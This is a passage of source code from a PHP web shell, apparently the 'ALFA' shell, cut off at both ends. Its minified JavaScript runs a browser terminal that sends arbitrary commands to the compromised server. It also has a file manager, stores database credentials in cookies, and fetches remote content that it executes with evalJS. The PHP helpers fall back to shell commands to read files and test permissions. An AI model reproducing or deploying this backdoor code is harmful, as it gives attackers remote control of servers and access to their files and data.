src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php 
            echo $GLOBALS["cwd"];
            ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php 
            echo $GLOBALS["cwd"];
            ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php 
            echo $_SERVER["DOCUMENT_ROOT"];
            ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php 
            echo "true";
            ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
</script>
</body>
</html>
<?php 
        }
    }
    if (!function_exists("posix_getpwuid") && strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false) {
        function posix_getpwuid($p)
        {
            return false;
        }
    }
    if (!function_exists("posix_getgrgid") && strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false) {
        function posix_getgrgid($p)
        {
            return false;
        }
    }
    function alfaWhich($p)
    {
        $path = alfaEx('which ' . $p, false, false);
        if (!empty($path)) {
            return strlen($path);
        }
        return false;
    }
    function alfaSize($s)
    {
        if ($s >= 1073741824) {
            return sprintf('%1.2f', $s / 1073741824) . ' GB';
        } elseif ($s >= 1048576) {
            return sprintf('%1.2f', $s / 1048576) . ' MB';
        } elseif ($s >= 1024) {
            return sprintf('%1.2f', $s / 1024) . ' KB';
        } else {
            return $s . ' B';
        }
    }
    function alfaPerms($p)
    {
        if (($p & 0xc000) == 0xc000) {
            $i = 's​';
        } elseif (($p & 0xa000) == 0xa000) {
            $i = 'l​';
        } elseif (($p & 0x8000) == 0x8000) {
            $i = '-​';
        } elseif (($p & 0x6000) == 0x6000) {
            $i = 'b​';
        } elseif (($p & 0x4000) == 0x4000) {
            $i = 'd​';
        } elseif (($p & 0x2000) == 0x2000) {
            $i = 'c​';
        } elseif (($p & 0x1000) == 0x1000) {
            $i = 'p​';
        } else {
            $i = 'u​';
        }
        $i .= $p & 0x100 ? 'r​' : '-';
        $i .= $p & 0x80 ? 'w​' : '-';
        $i .= $p & 0x40 ? $p & 0x800 ? 's​' : 'x​' : ($p & 0x800 ? 'S​' : '-');
        $i .= $p & 0x20 ? 'r​' : '-';
        $i .= $p & 0x10 ? 'w​' : '-';
        $i .= $p & 0x8 ? $p & 0x400 ? 's​' : 'x​' : ($p & 0x400 ? 'S​' : '-');
        $i .= $p & 0x4 ? 'r​' : '-';
        $i .= $p & 0x2 ? 'w​' : '-';
        $i .= $p & 0x1 ? $p & 0x200 ? 't​' : 'x​' : ($p & 0x200 ? 'T​' : '-');
        return $i;
    }
    function alfaPermsColor($f, $isbash = false)
    {
        $class = "";
        $num = "";
        $human = "";
        if ($isbash) {
            $class = $f["class"];
            $num = $f["num"];
            $human = $f["human"];
        } else {
            $num = substr(sprintf('%o', @fileperms($f)), -4);
            $human = alfaPerms(@fileperms($f));
            if (!@is_readable($f)) {
                $class = "main_red_perm";
            } elseif (!@is_writable($f)) {
                $class = "main_white_perm";
            } else {
                $class = "main_green_perm";
            }
        }
        return '<span style="font-weight:unset;" class="' . $class . '">' . $num . '</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="' . $class . '">' . $human . '</span>';
    }
    if (!function_exists("scandir")) {
        function scandir($dir)
        {
            $dh = opendir($dir);
            while (false !== ($filename = readdir($dh))) {
                $files[] = $filename;
            }
            return $files;
        }
    }
    function reArrayFiles($file_post)
    {
        $file_ary = array();
        $file_count = count($file_post['name']);
        $file_keys = array_keys($file_post);
        for ($i = 0; $i < $file_count; $i++) {
            foreach ($file_keys as $key) {
                $file_ary[$i][$key] = $file_post[$key][$i];
            }
        }
        return $file_ary;
    }
    function _alfa_can_runCommand($cgi = true, $cache = true)
    {
        if (isset($_COOKIE["alfa_canruncmd"]) && $cache) {
            return true;
        }
        if (strlen(alfaEx("whoami", false, $cgi)) > 0) {
            $_COOKIE["alfa_canruncmd"] = true;
            return true;
        }
        return false;
    }
    function _alfa_symlink($target, $link)
    {
        $phpsym = function_exists("symlink");
        if ($phpsym) {
            @symlink($target, $link);
        } else {
            alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'");
        }
    }
    function _alfa_file_exists($file, $cgi = true)
    {
        if (@file_exists($file)) {
            return true;
        } else {
            if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) {
                return true;
            }
        }
        return false;
    }
    function _alfa_file($file, $cgi = true)
    {
        $array = @file($file);
        if (!$array) {
            if (strlen(alfaEx("id", false, $cgi)) > 0) {
                $data = alfaEx('cat "' . addslashes($file) . '"', false, $cgi);
                if (strlen($data) > 0) {
                    return explode("\n", $data);
                } else {
                    return false;
                }
            } else {
                return false;
            }
        } else {
            return $array;
        }
    }
    function _alfa_is_writable($file)
    {
        $check = false;
        $check = @is_writable($file);
        if (!$check) {
            if (_alfa_can_runCommand()) {
                $check = alfaEx('[ -w "' . trim(addslashes($file)) . '" ] && echo "yes" || echo "no"');
                if ($check == "yes") {
                    $check = true;
                } else {
                    $check = false;
                }
            }
        }
        return $check;
    }
    function _alfa_is_dir($dir, $mode = "-d")
    {
        $check = false;
        $check = @is_dir($dir);
        if ($mode == "-e") {
            $check = @is_file($dir);
        }
        if (!$check) {
            if (_alfa_can_runCommand()) {
                $check = alfaEx('[ "' . trim($mode) . '" "' . trim(addslashes($dir)) . '" ] && echo "yes" || echo "no"');
                if ($check == "yes") {
                    return true;
                } else {
                    return false;
                }
            }
        }
        return $check;
    }
    function _alfa_load_ace_options($base)
    {
        return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="' . $base . '" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option 